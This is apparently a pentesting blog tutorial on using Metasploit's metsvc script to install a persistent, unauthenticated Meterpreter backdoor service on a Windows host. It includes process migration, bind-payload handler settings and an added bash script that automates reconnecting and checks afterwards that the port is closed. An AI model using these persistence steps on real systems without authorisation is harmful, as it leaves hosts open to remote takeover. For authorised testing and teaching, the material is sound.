23rd October 2021

MSF Meterpreter Backdoor – What is metsvc?

Once you have a Meterpreter session on a target, one way to maintain persistence is the metsvc script, which installs Meterpreter as a Windows service. The service listens on a TCP port (31337 by default) and lets you reconnect whenever you want. The catch is that the listener is unauthenticated: anyone who can reach that port on the machine where you installed it can use the backdoor, not just you. Remove it (run metsvc -r) when the pentest is over, otherwise you leave the system open to malicious people, and the system owners will not be pleased.

Meterpreter session

First, open a Meterpreter session using the module for a vulnerability you have found.

Find the PID of explorer.exe with the ps command and move the session into that process with the migrate command. explorer.exe is a long-lived process, so the session survives even if the exploited process crashes or is closed. Note that migrating does not raise your privileges: installing a service requires administrative rights, so check getuid before going further.

metsvc -h

Before running the metsvc script, view its help (run metsvc -h) to see what it offers: with no options it installs the service, -A additionally starts a matching multi/handler and connects to the new service right away, and -r removes a previously installed service.

Run metsvc

metsvc can also hand us a fresh connection as soon as it is installed (the -A option), but since we already have a Meterpreter session we do not need that now. Run the script without options: run metsvc. It uploads its components to a temporary directory on the target and registers them as a Windows service, which is why the session must have administrative privileges.

Communication with metsvc Service

metsvc is now installed and listening, waiting for a connection. Let us see how to communicate with it.

To connect to the metsvc service listening on the target we use the payload windows/metsvc_bind_tcp with exploit/multi/handler. Set RHOST to the target address and LPORT to the port metsvc listens on (31337 unless you changed it), then run the handler. Because this is a bind payload, the handler connects out to the target rather than waiting for a callback, so that port must be reachable from your machine, which is also exactly why anyone else who can reach it can use the backdoor.

PID number of metsvc service

As you can see, session 1 opened automatically. Next we check which PID the metsvc service runs under on the target computer.

The output shows metsvc running as PID 2560. From now on we can reconnect to the service listening on the target with the windows/metsvc_bind_tcp payload whenever we like.

Note: remove the metsvc service from the system (run metsvc -r from a Meterpreter session) when your security test is complete, and confirm afterwards that the port is no longer accepting connections.
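The reconnect step above and the removal check in this note, as an added example that is not part of the original post: a bash script run from the attacker's machine. It assumes msfconsole is on PATH, that TARGET is the lab victim's address (a placeholder), and that metsvc is on its default port 31337. The Meterpreter-side commands (run metsvc, run metsvc -r) are still typed in the session itself and are not automated here.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post: wrap the reconnect and the
# post-cleanup check in a small script run from the attacker's shell.
# Assumptions: TARGET is the lab victim's address (placeholder), PORT is
# metsvc's default 31337, and msfconsole is on PATH.
TARGET="${TARGET:-192.168.56.101}"   # assumed lab address, change it
PORT="${PORT:-31337}"                # metsvc default listening port

# Emit a msfconsole resource script that connects to an installed metsvc.
# windows/metsvc_bind_tcp is a bind payload: the handler dials RHOST:LPORT.
handler_rc() {
  local rhost="$1" lport="$2"
  cat <<EOF
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set RHOST $rhost
set LPORT $lport
exploit
EOF
}

# TCP connect test using bash's /dev/tcp (no nmap or nc needed).
# Returns 0 if the port accepts connections, 1 if it is closed or filtered,
# 2 if the check itself could not be performed.
port_open() {
  local host="$1" port="$2"
  command -v timeout >/dev/null 2>&1 || return 2
  timeout 3 bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null && return 0
  return 1
}

# Reconnect to the backdoor whenever you want during the engagement.
reconnect() {
  local rc
  rc="$(mktemp)"
  handler_rc "$TARGET" "$PORT" > "$rc"
  msfconsole -q -r "$rc"
  rm -f "$rc"
}

# After `run metsvc -r` in the Meterpreter session, prove the listener is gone.
# Returns 0 only when the port is confirmed closed; "could not check" is not
# treated as success, since a false all-clear leaves a live backdoor behind.
verify_removed() {
  local status=0
  port_open "$TARGET" "$PORT" || status=$?
  case "$status" in
    0) echo "[!] $TARGET:$PORT still accepts connections: metsvc NOT removed"; return 1 ;;
    1) echo "[+] $TARGET:$PORT closed: metsvc backdoor removed"; return 0 ;;
    *) echo "[?] could not test $TARGET:$PORT (is 'timeout' installed?)"; return 2 ;;
  esac
}

# Usage: ./metsvc_check.sh reconnect   or   ./metsvc_check.sh verify
case "${1:-}" in
  reconnect) reconnect ;;
  verify)    verify_removed ;;
esac
```

Run the verify action after run metsvc -r and before closing the engagement. A "could not test" result is deliberately not reported as clean: the one outcome you must avoid is a false all-clear that leaves an unauthenticated, reachable backdoor on the client's system.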
